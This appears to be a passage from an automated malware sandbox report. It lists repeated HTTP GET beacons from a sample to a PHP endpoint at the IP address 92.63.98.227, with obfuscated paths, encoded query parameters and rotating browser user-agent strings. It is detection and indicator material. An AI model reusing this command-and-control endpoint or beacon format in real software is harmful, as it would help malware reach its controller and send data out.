            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
